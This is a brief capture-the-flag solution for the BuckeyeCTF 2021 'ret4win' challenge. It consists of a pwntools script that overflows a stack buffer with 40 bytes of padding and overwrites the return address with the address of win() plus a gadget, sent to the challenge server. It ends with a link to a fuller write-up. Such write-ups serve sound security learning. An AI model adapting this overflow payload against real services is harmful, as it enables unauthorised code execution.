Tags: ret4win 2021 pwn buckeyectf rop
Rating:
```
from pwn import *
target = remote('pwn.chall.pwnoh.io',13379)
payload = b'A'*40 # 40 bytes offset
payload += p64(0x00000000004011e0) # address of win() overwriting RIP
payload += p64(0x0000000000401245) # address of mov rdi, rax
print(target.recvline())
target.sendline(payload)
print(target.recvall())
```
[full writeup](https://7phalange7.github.io/2021/10/25/buckeyectf.html#ret4win)